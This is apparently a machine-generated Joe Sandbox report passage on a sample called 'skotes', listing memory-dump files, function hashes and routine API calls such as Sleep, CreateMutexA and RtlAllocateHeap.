Associated: 00000002.00000002.2131297846.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131339315.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131412184.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131429177.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131446330.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131463521.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131482625.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131500783.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: f1b7e8f954c823335d80da12e0e1cb96e15f7f3c6420a9445d9f530edff1868c
Instruction ID: 7bea5e89ea53f4826a0120fd97376282bd77ff7f8dd7459dce8a11683e9764da
Opcode Fuzzy Hash: f1b7e8f954c823335d80da12e0e1cb96e15f7f3c6420a9445d9f530edff1868c
Instruction Fuzzy Hash: B6316A71B041048BEB18DB7DCD89BEDB762EFC5324F244219E454EB2D5CB399A80EB12

Function 00FBA682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.2129751050.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2129775105.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130310934.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130333140.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130355615.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130377442.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130404260.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130539606.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130562836.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130636306.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130654760.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130673771.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130737289.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130762098.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130787175.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130823389.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130840774.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130864322.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130895390.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130924370.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130947293.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130972857.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130998115.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131016737.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131036067.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131054531.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131069617.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131083882.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131098490.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131114327.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131129643.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131144841.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131161563.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131177987.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131193689.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131210563.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131225546.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131252191.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131297846.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131339315.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131412184.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131429177.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131446330.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131463521.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131482625.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131500783.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 3df8852030253e3546ec944d15fe715fad765aacf305aaccf99171918ea3880e
Instruction ID: e81d45e85c26b21dbae381082070452ab23891e628538d4afd4706d404daac52
Opcode Fuzzy Hash: 3df8852030253e3546ec944d15fe715fad765aacf305aaccf99171918ea3880e
Instruction Fuzzy Hash: 46318A71B041049BEB18DB79CDC5BEDBB72EF85320F248218E014EB2D5CB398980EB52

Function 00FB9ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.2129751050.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2129775105.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130310934.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130333140.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130355615.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130377442.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130404260.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130539606.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130562836.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130636306.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130654760.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130673771.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130737289.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130762098.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130787175.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130823389.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130840774.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130864322.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130895390.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130924370.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130947293.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130972857.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130998115.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131016737.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131036067.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131054531.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131069617.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131083882.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131098490.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131114327.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131129643.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131144841.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131161563.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131177987.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131193689.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131210563.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131225546.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131252191.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131297846.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131339315.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131412184.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131429177.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131446330.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131463521.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131482625.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131500783.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: da0b59dd0eee0873bdc80e74f604d40ec0781b0659e66ae1587b236614c102e7
Instruction ID: 306df409ce1e4fddf8355895894ca9e73bd4d5cdb636d0a7699835f9e0c20c5c
Opcode Fuzzy Hash: da0b59dd0eee0873bdc80e74f604d40ec0781b0659e66ae1587b236614c102e7
Instruction Fuzzy Hash: 52217C317082009BFB18AB29DDC5BACF761EFC1320F20421DE504DB6D5D7BA5980EB11

Function 00FBA856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.2129751050.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2129775105.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130310934.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130333140.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130355615.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130377442.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130404260.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130539606.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130562836.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130636306.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130654760.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130673771.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130737289.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130762098.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130787175.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130823389.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130840774.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130864322.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130895390.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130924370.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130947293.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130972857.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130998115.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131016737.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131036067.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131054531.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131069617.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131083882.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131098490.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131114327.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131129643.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131144841.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131161563.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131177987.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131193689.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131210563.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131225546.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131252191.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131297846.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131339315.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131412184.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131429177.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131446330.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131463521.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131482625.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131500783.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5fda3f4d13b929a3f9025f71771509710fc35707cb9eb96d32edd5242a2ef01a
Instruction ID: c676cf6daea1df81464cfbcda5e3822af95f8913b1aeccaa03df2e221daccf36
Opcode Fuzzy Hash: 5fda3f4d13b929a3f9025f71771509710fc35707cb9eb96d32edd5242a2ef01a
Instruction Fuzzy Hash: 78219D31A482018AF724776BCC967EDB651EF80310F20081AE448D66D1CA7E8880FA93

Function 00FBA34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.2129751050.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2129775105.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130310934.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130333140.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130355615.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130377442.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130404260.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130539606.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130562836.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130636306.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130654760.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130673771.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130737289.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130762098.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130787175.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130823389.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130840774.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130864322.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130895390.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130924370.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130947293.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130972857.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130998115.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131016737.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131036067.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131054531.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131069617.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131083882.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131098490.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131114327.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131129643.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131144841.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131161563.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131177987.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131193689.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131210563.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131225546.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131252191.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131297846.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131339315.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131412184.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131429177.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131446330.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131463521.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131482625.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131500783.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 9107712d2d136f9f335d532abd9dfb4a1dc23ac0ed5aa14cacf8f72080c697de
Instruction ID: 42fb1752dd0e7eaafc12badf130ff0a1d5c5d3b9abfe79f5782ecd10098ba293
Opcode Fuzzy Hash: 9107712d2d136f9f335d532abd9dfb4a1dc23ac0ed5aa14cacf8f72080c697de
Instruction Fuzzy Hash: 83219E317442009BFB18AB6DDD85BECB7A1EFC1320F24421DE404DB6D4D77A5580EB52

Function 00FED82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00FEA813,00000001,00000364,00000006,000000FF,?,00FEEE3F,?,00000004,00000000,?,?), ref: 00FED871

Memory Dump Source

Source File: 00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.2129751050.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2129775105.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130310934.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130333140.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130355615.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130377442.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130404260.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130539606.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130562836.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130636306.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130654760.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130673771.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130737289.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130762098.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130787175.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130823389.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130840774.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130864322.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130895390.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130924370.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130947293.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130972857.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130998115.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131016737.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131036067.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131054531.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131069617.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131083882.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131098490.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131114327.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131129643.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131144841.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
